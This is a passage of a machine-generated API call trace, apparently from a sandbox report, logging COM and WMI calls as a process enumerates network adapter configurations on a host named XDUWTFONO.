Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.599] WbemDefPath:IUnknown:Release (This=0x717630) returned 0x3 [0197.599] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.599] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.599] WbemDefPath:IUnknown:Release (This=0x521ed80) returned 0x2 [0197.599] WbemDefPath:IUnknown:Release (This=0x521ed80) returned 0x1 [0197.599] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.600] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.600] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521ed80) returned 0x0 [0197.600] WbemDefPath:IUnknown:AddRef (This=0x521ed80) returned 0x3 [0197.600] WbemDefPath:IUnknown:Release (This=0x521ed80) returned 0x2 [0197.600] WbemDefPath:IWbemPath:SetText (This=0x521ed80, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.600] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.600] IWbemClassObject:Get (in: This=0x521d9e8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578e78*=0, plFlavor=0x2578e7c*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578e78*=11, plFlavor=0x2578e7c*=0) returned 0x0 [0197.600] IWbemClassObject:Get (in: This=0x521d9e8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578e78*=11, plFlavor=0x2578e7c*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578e78*=11, plFlavor=0x2578e7c*=0) returned 0x0 [0197.600] CoTaskMemAlloc (cb=0x4) returned 0x7178c0 [0197.600] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x7178c0, puReturned=0x2576450 | out: apObjects=0x7178c0*=0x521ee80, puReturned=0x2576450*=0x1) returned 0x0 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x521ee80) returned 0x0 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.601] IUnknown:AddRef (This=0x521ee80) returned 0x3 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x521ee84) returned 0x0 [0197.601] IMarshal:GetUnmarshalClass (in: This=0x521ee84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.601] IUnknown:Release (This=0x521ee84) returned 0x3 [0197.601] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.601] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.601] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.602] IUnknown:Release (This=0x521ee80) returned 0x2 [0197.602] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.602] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.602] IUnknown:QueryInterface (in: This=0x521ee80, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x521ee80) returned 0x0 [0197.602] IUnknown:AddRef (This=0x521ee80) returned 0x4 [0197.602] IUnknown:Release (This=0x521ee80) returned 0x3 [0197.602] IUnknown:Release (This=0x521ee80) returned 0x2 [0197.602] CoTaskMemFree (pv=0x7178c0) [0197.602] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.602] IUnknown:AddRef (This=0x521ee80) returned 0x3 [0197.602] IWbemClassObject:Get (in: This=0x521ee80, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.602] IWbemClassObject:Get (in: This=0x521ee80, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=5", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.602] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=5") returned 0x80 [0197.602] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=5") returned 0x80 [0197.602] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.602] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.602] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.602] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.603] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x521cc88) returned 0x0 [0197.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cc88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.603] WbemDefPath:IClassFactory:CreateInstance (in: This=0x521cc88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521f1b8) returned 0x0 [0197.603] WbemDefPath:IUnknown:Release (This=0x521cc88) returned 0x0 [0197.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521f1b8) returned 0x0 [0197.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.603] WbemDefPath:IUnknown:AddRef (This=0x521f1b8) returned 0x3 [0197.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.603] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x7178c0) returned 0x0 [0197.604] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7178c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.604] WbemDefPath:IUnknown:Release (This=0x7178c0) returned 0x3 [0197.604] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.604] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.604] WbemDefPath:IUnknown:Release (This=0x521f1b8) returned 0x2 [0197.604] WbemDefPath:IUnknown:Release (This=0x521f1b8) returned 0x1 [0197.604] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.604] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.604] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f1b8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521f1b8) returned 0x0 [0197.604] WbemDefPath:IUnknown:AddRef (This=0x521f1b8) returned 0x3 [0197.604] WbemDefPath:IUnknown:Release (This=0x521f1b8) returned 0x2 [0197.604] WbemDefPath:IWbemPath:SetText (This=0x521f1b8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=5") returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.604] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.604] IWbemClassObject:Get (in: This=0x521ee80, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25796b0*=0, plFlavor=0x25796b4*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25796b0*=11, plFlavor=0x25796b4*=0) returned 0x0 [0197.604] IWbemClassObject:Get (in: This=0x521ee80, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25796b0*=11, plFlavor=0x25796b4*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x25796b0*=11, plFlavor=0x25796b4*=0) returned 0x0 [0197.604] CoTaskMemAlloc (cb=0x4) returned 0x7178e0 [0197.604] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x7178e0, puReturned=0x2576450 | out: apObjects=0x7178e0*=0x521f2b8, puReturned=0x2576450*=0x1) returned 0x0 [0197.605] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x521f2b8) returned 0x0 [0197.605] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.605] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.605] IUnknown:AddRef (This=0x521f2b8) returned 0x3 [0197.605] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.606] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.606] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x521f2bc) returned 0x0 [0197.606] IMarshal:GetUnmarshalClass (in: This=0x521f2bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.606] IUnknown:Release (This=0x521f2bc) returned 0x3 [0197.606] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.606] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.606] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.606] IUnknown:Release (This=0x521f2b8) returned 0x2 [0197.606] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.606] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.606] IUnknown:QueryInterface (in: This=0x521f2b8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x521f2b8) returned 0x0 [0197.606] IUnknown:AddRef (This=0x521f2b8) returned 0x4 [0197.606] IUnknown:Release (This=0x521f2b8) returned 0x3 [0197.606] IUnknown:Release (This=0x521f2b8) returned 0x2 [0197.606] CoTaskMemFree (pv=0x7178e0) [0197.606] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.606] IUnknown:AddRef (This=0x521f2b8) returned 0x3 [0197.606] IWbemClassObject:Get (in: This=0x521f2b8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.606] IWbemClassObject:Get (in: This=0x521f2b8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=6", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.606] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=6") returned 0x80 [0197.606] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=6") returned 0x80 [0197.606] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.606] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.607] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.607] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.607] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x521cc98) returned 0x0 [0197.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cc98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.607] WbemDefPath:IClassFactory:CreateInstance (in: This=0x521cc98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521f6a8) returned 0x0 [0197.607] WbemDefPath:IUnknown:Release (This=0x521cc98) returned 0x0 [0197.607] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521f6a8) returned 0x0 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.608] WbemDefPath:IUnknown:AddRef (This=0x521f6a8) returned 0x3 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, 